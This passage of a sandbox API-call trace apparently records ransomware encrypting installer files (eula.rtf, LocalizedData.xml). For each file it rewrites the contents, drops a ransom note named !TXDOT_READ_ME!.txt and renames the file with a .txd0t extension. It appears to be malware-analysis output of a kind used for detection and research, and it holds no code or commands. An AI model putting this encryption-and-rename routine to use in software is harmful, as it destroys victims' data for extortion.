[0086.176] FlushFileBuffers (hFile=0x478) returned 1 [0086.180] CloseHandle (hObject=0x478) returned 1 [0086.180] GetProcessHeap () returned 0xe30000 [0086.180] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.180] CloseHandle (hObject=0x46c) returned 1 [0086.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.txd0t")) returned 1 [0086.181] SetEvent (hEvent=0x40c) returned 1 [0086.181] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.183] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" [0086.183] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t" [0086.183] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t") returned 0 [0086.184] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.184] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0086.184] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=3683) returned 1 [0086.184] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.184] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.189] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffffef9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.189] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xe60, lpOverlapped=0x0) returned 1 [0086.189] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffff1a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.189] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xe60, lpOverlapped=0x0) returned 1 [0086.189] FlushFileBuffers (hFile=0x464) returned 1 [0086.193] GetProcessHeap () returned 0xe30000 [0086.193] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe41328 [0086.193] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" [0086.193] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="eula.rtf" [0086.193] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.193] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt") returned 0 [0086.193] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1046\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0086.198] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0086.199] FlushFileBuffers (hFile=0x46c) returned 1 [0086.206] WriteFile (in: hFile=0x46c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0086.206] FlushFileBuffers (hFile=0x46c) returned 1 [0086.208] CloseHandle (hObject=0x46c) returned 1 [0086.208] GetProcessHeap () returned 0xe30000 [0086.208] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.208] CloseHandle (hObject=0x464) returned 1 [0086.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.txd0t")) returned 1 [0086.208] SetEvent (hEvent=0x40c) returned 1 [0086.208] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.209] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" [0086.209] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t" [0086.209] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t") returned 0 [0086.209] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.210] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0086.210] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=54456) returned 1 [0086.210] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.210] WriteFile (in: hFile=0x464, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.233] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff2948, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.233] ReadFile (in: hFile=0x464, lpBuffer=0x415b020, nNumberOfBytesToRead=0xd4b0, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xd4b0, lpOverlapped=0x0) returned 1 [0086.235] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff2b50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.235] WriteFile (in: hFile=0x464, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xd4b0, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xd4b0, lpOverlapped=0x0) returned 1 [0086.236] FlushFileBuffers (hFile=0x464) returned 1 [0086.241] GetProcessHeap () returned 0xe30000 [0086.241] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0086.241] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" [0086.241] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="eula.rtf" [0086.241] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.241] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt") returned 0 [0086.241] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\1049\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0086.246] WriteFile (in: hFile=0x460, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0086.247] FlushFileBuffers (hFile=0x460) returned 1 [0086.261] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0086.264] FlushFileBuffers (hFile=0x460) returned 1 [0086.267] CloseHandle (hObject=0x460) returned 1 [0086.267] GetProcessHeap () returned 0xe30000 [0086.267] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.267] CloseHandle (hObject=0x464) returned 1 [0086.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.txd0t")) returned 1 [0086.268] SetEvent (hEvent=0x40c) returned 1 [0086.268] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.272] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0086.272] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t" [0086.272] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t") returned 0 [0086.274] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.277] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0086.277] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=77680) returned 1 [0086.278] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.278] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.280] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffece90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.280] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x12f70, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x12f70, lpOverlapped=0x0) returned 1 [0086.283] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffed090, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.283] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x12f70, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x12f70, lpOverlapped=0x0) returned 1 [0086.283] FlushFileBuffers (hFile=0x46c) returned 1 [0086.428] GetProcessHeap () returned 0xe30000 [0086.428] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.429] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0086.429] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="LocalizedData.xml" [0086.429] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.429] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1053\\!TXDOT_READ_ME!.txt") returned 1 [0086.429] GetProcessHeap () returned 0xe30000 [0086.429] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.429] CloseHandle (hObject=0x46c) returned 1 [0086.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.txd0t")) returned 1 [0086.430] SetEvent (hEvent=0x40c) returned 1 [0086.430] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.436] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0086.437] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t" [0086.437] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t") returned 0 [0086.437] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.438] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0086.438] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=76818) returned 1 [0086.438] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.438] WriteFile (in: hFile=0x474, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.440] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffed1ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.440] ReadFile (in: hFile=0x474, lpBuffer=0x415b020, nNumberOfBytesToRead=0x12c10, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x12c10, lpOverlapped=0x0) returned 1 [0086.458] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffed3f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.458] WriteFile (in: hFile=0x474, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x12c10, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x12c10, lpOverlapped=0x0) returned 1 [0086.461] FlushFileBuffers (hFile=0x474) returned 1 [0086.617] GetProcessHeap () returned 0xe30000 [0086.617] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.617] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0086.617] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="LocalizedData.xml" [0086.617] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.617] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt") returned 1 [0086.618] GetProcessHeap () returned 0xe30000 [0086.618] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.618] CloseHandle (hObject=0x474) returned 1 [0086.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.txd0t")) returned 1 [0086.618] SetEvent (hEvent=0x40c) returned 1 [0086.618] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.622] StrCpyW (in: psz1=0x4a9f760, psz2="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" [0086.622] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t" [0086.622] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t") returned 0 [0086.622] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.630] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0086.630] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=4015) returned 1 [0086.630] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.630] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.636] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffee51, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.636] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xfa0, lpNumberOfBytesRead=0x4a9f720, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f720*=0xfa0, lpOverlapped=0x0) returned 1 [0086.636] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffff060, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.636] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x4a9f724, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f724*=0xfa0, lpOverlapped=0x0) returned 1 [0086.636] FlushFileBuffers (hFile=0x47c) returned 1 [0086.655] GetProcessHeap () returned 0xe30000 [0086.655] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0086.655] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" [0086.655] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="eula.rtf" [0086.655] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.655] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt") returned 0 [0086.655] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\2070\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0086.659] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f754*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x4a9f754*, lpNumberOfBytesWritten=0x4a9f750*=0x2, lpOverlapped=0x0) returned 1 [0086.659] FlushFileBuffers (hFile=0x46c) returned 1 [0086.664] WriteFile (in: hFile=0x46c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f750, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f750*=0x7f0, lpOverlapped=0x0) returned 1 [0086.664] FlushFileBuffers (hFile=0x46c) returned 1 [0086.722] CloseHandle (hObject=0x46c) returned 1 [0086.722] GetProcessHeap () returned 0xe30000 [0086.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.722] CloseHandle (hObject=0x47c) returned 1 [0086.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t")) returned 1 [0086.723] SetEvent (hEvent=0x40c) returned 1 [0086.723] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0086.728] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" [0086.728] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t" [0086.728] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t") returned 0 [0086.728] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", dwFileAttributes=0x80) returned 1 [0086.728] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0086.728] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=60816) returned 1 [0086.728] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.728] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0086.730] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1070, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.730] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xed90, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xed90, lpOverlapped=0x0) returned 1 [0086.734] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1270, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.734] 